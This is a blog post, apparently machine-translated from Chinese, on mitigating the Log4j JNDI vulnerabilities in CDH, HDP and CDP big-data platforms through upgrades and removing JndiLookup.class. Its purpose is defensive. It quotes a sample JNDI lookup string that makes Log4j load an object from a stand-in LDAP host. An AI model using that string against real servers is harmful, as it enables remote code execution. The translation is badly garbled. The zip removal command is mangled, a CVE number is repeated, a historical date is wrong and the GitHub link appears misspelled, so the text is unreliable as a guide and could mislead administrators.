How to quickly deal with Log4J JNDI series vulnerabilities in large data platforms such as CDH / HDP / CDP

Hello everyone, I am a bright brother!

Recently, log4j is frequently rioted around JNDI, and it is really busy for a while.

Let’s take a look at the CDH / HDP / CDP and other large data platforms to quickly deal with the JNDI series vulnerability of Log4j.

1 log4j Overview 2 Log4J JNDI Series Vulnerability Overview 3 Deep In – depth Log4J and JNDI4 Coping to Log4J JNDI Series Vulnerabilities 5 Common Big Data Components How to Coping Log4J JNDi Series Vulnerability 6 CDH / HDP / CDP Abstract Log4J JNDI Series vulnerability

1 log4j overview

Apache log4j is a Java-based open source log frame, and Apache log4j2 is based on the log4j, referring to another log frame logback, and has made a lot of improvements to add a lot of rich features.

In implementations, log4j2 achieves API seperation, including log4j-core and log4j-API, where the former is the specific implementation of the log frame (logback is another specific implementation of the log frame), the latter is the log facade / log abstraction Logging FACADE (SIMPLE LoggingFacade for Java (SLF4J) is another log facade / log abstraction).

In terms of performance, log4j2 uses Asynchronous loggers (application code when calling logger.log, actually handing the I / O operation to another IO thread, and immediately returns the application thread), in multithreaded environment Under, you can do LOG4J1.X and LOGBACK18 times throughput and have a lower delay.

On the architecture, log4j2 uses a plugin mechanism, so users do not need to write an extra code, which can be configured according to their own situation, and log4j2 automatically identifies the configuration file and uses the plugin configured in it.

It is formally because of the above advantages, Log4j has become the most widely used log framework in the Java ecology.

2 log4j jndi series vulnerability overview

The JNDI series vulnerabilities in the near future, including the following three:

CVE-2021-44228: December 9, by Ali Cloud found and reported that the vulnerability is based on this vulnerability, an attacker can construct a malicious request, trigger a remote code execution vulnerability; Log4j team released 2.15.0 immediately after discovering the issue. Version, and give a temporary solution; (Hazard) CVE-2021-45046: On 14 December, Twitter discovered and reported to this vulnerability, which represents CVE-2021-44228 in 2.15.0. Repair and the temporary solution given is incomplete. It is still useful in some configuration conditions that caused the DOS attack; the log4j team has released a 2.16.0 version after discovering the issue, and a new temporary solution is given. Program; (Hazard) CVE-2021-45105: December 18, found and confirmed the vulnerability, which further represents 2.16.0 version and CVE-2021-45046 temporary repair scheme under certain configuration conditions. Still have the risk of being attacked by DOS; then, the log4j team immediately released version 2.17.0, and gave a new temporary fix scheme; (Hazard Level: Moderate)

The above JNDI series vulnerabilities have been repaired, summarized, CVE-2021-44228 and CVE-2021-44228 and CVE-2021-45046 for dangerous grades, the solution is as follows:

Log4j 1.x is not impacted by this Vulnerability.log4j2: Upgrade to log4j 2.3.1 (for Java 6), 2.12.3 (for Java 7), OR 2.17.0 (for Java 8 and Later) .log4j2: in Any release other than 2.16.0, you may remove the JndiLookup classfrom the classpath:. zip -q -d log4j-core – * jarorg / apache / logging / log4j / core / lookup / JndiLookup.classlog4j2: Users are advised not to enable JNDI In log4j 2.16.0, Since It Stillallows LDAP Connections.3 in-depth understanding Log4j and JNDI

The above JNDI series vulnerabilities can be traced back to the introduction of Log4j’s early birth: log4j2-313: JNDI Lookup Pluginsupport: 2013, log4j adds the “JNDILOOKUP PLUGIN” feature in the 2.0-Beta9 version.

JNDI is actually a directory service introduced by Java in 1990, is an important part of J2EE, allowing the Java program to find data in the form of a Java object. JNDI provides a variety of SPI supports different directory services such as CORBA COS (Public Object Services), Java RMI (Remote Method Interface) Registry and LDAP (Lightweight Directory Access Protocol).

According to JNDI official help document description “If your LDAP server is on another machine or is using another port, then you need to edit LDAP URL”, the LDAP server can run on different machines, or anything on the Internet Local operation. This flexibility means that if an attacker can control the LDAP URL, they will allow the Java program to load objects from their control.

In the LOG4J contains the vulnerability, the attacker can control the LDAP URL access to the log4j by incorporating a string similar to “$ {JNDI: LDAP: //example.com/a}”. In this case, the log4j will connect to the LDAP server on the example.com and retrieve objects.

More about JNDI details, we will not repeat it here, interested, you can do your own homework, but the following points are summarized:

JNDI is an important part of J2EE. It is introduced in the 1990s, there is a large number of applications in JBoss, WebLogic, WebSphere and other application containers; in the monomer framework, the micro-service architecture is increasingly popular today, everyone generally uses Spring Boot / Spring Cloud Technology Stack, I haven’t used JNDi; (especially Internet companies and SMEs, many students may have not learned JNDI); log4j introduced by log4j2-313 “JNDI Lookup Plugin Support”, more Most of them are catering to adopting a monomer architecture, using the large customers of the application containers such as JBoss, WebLogic, WebSphere; use log4j in the micro service architecture, most users do not use their “JNDI Lookup Plugin Support” function; In the large data component of log4j, it is not used to use its “JNDI Lookup Plugin Support” function;

4 Coping to Log4j JNDI Series Vulnerability

Fundamentally, the idea of ??dealing with the Log4j JNDI series vulnerability is as stated in its official documentation:

Log4J 1.x: This series is not affected, because the above log4j2-313: JNDI LOOKUP PLUGIN Support; log4j2: formal solution is an upgrade version: This is upgraded to log4j 2.3.1 (for Java 6) 2.12.3 (for Java 7), OR 2.17.0 (for Java 8 and Later); log4j2: As a temporary solution, you can delete the dangerkuokup.class on the class load path: Except for other versions of 2.16.0 This can be temporarily adopted; (essence is because we do not use the “JNDI Lookup Plugin Support” feature of log4j; log4j2: Do not enable JNDI function: For version 2.16.0, users can also configure the JNDI function To avoid potential possibilities and risk of establishing an LDAP connection; (2.16.0 provides the configuration item, you can turn the JNDI function on or off, so you don’t have to delete the dangerous JNDILOOKUP.CLASS on the class load path);

If everyone’s application code, directly rely on log4j, you can flexibly adopt the above-mentioned programs, the most recommended is of course an upgrade log4j version; if everyone’s application code is indirectly introduced into Log4J, The temporary solution can be employed, ie the dangerous JNDILOOKUP.CLASS on the class load path; or wait for the official repair version to be upgraded.

5 How to deal with the log4j jndi series vulnerability

Spark: Spark’s latest version is 3.2.0, which is currently dependent or log4j1.2.17, that is, the log4j1.x series, so it is not affected by the above vulnerability; FLINK: FLINK version used the log4j version of the log4j, you can see, Flink1 .11 and later have been influenced by the above vulnerability; so the official fix scheme is upgraded to the FLINK. At present, the FLINK community has released a repair version for 1.11 / 1.12 / 1.13 / 1.14 series. You can upgrade according to your own situation. To the latest version of the same series, you can repair this problem: Thanks to the FLINK community, even the response and repair, you don’t need to adopt a variety of temporary fix schemes (main ideas is to delete the jndilop.class in log4j-core, Reach the effect of disabling JNDI)

6 How to quickly deal with Log4j’s JNDI series vulnerabilities in large data platforms such as CDH / HDP / CDP

Due to large data platforms such as CDH / HDP / CDP, there are many large data components behind, and the communities behind each component can respond quickly, fix the above log4j jNDi series vulnerabilities and provide formal repair versions, so CDH / HDP / Among the large data platforms such as CDP, quickly respond to the Log4J’s JNDI series vulnerability, the idea of ??using the above-mentioned temporary solutions, that is, the dangerous JNDILOOKUP.CLASS on the classes loaded path (essence is because these large data components are under the bottom floor, all No “JNDI Lookup Plugin Support” feature that log4j is used.

At the same time, in order to further simplify the difficulty of the temporary solution, Cloudera provides a series of scripts on Github to assist in deleting dangerous JNDILOOKUP.CLASS on large data platforms such as CDH / HDP / CDP.

Other big data platforms, such as TDH, etc., their idea is similar, and everyone can refer to the script described above, and modify it.

Everyone can go to GitHub to download the scripts yourself, GitHub download links are as follows: https: //github.com/cloudra/Cloudra-Scripts-for-log4j.git